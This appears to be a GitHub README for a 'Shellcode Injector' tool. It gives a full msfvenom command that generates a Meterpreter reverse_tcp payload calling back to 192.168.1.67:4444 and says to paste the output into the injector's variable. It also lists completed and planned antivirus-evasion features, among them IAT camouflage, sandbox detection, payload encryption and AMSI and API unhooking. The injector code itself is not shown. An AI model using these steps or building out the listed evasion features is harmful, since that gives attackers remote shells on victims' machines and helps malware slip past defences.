Skip to content

Latest commit

 

History

History
23 lines (19 loc) · 921 Bytes

File metadata and controls

23 lines (19 loc) · 921 Bytes

Shellcode Injector

instructions

  1. Gen your msfvenom shellcode : msfvenom -platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 -f c --var-name=wannabe
  2. Put your shellcode in the wannabe variable.

UPDATES

  • Added IAT camouflage
  • Added Force loading kernel32.dll
  • More to come.. need to bypass runtime...

To do

  • Add Sanbox detection (behavioral evasion)
  • Add payload encryption and decryption (static bypass)
  • Bypass execution (amsi + api unhooking)
  • Get shellcode from exe file and saving it in the var
  • UI

Warning

This does not bypass AV as of now, we did not implement anything for it. If you want to contribute and add it, feel free to do so. This is simply to play with memory allocation and execution.

image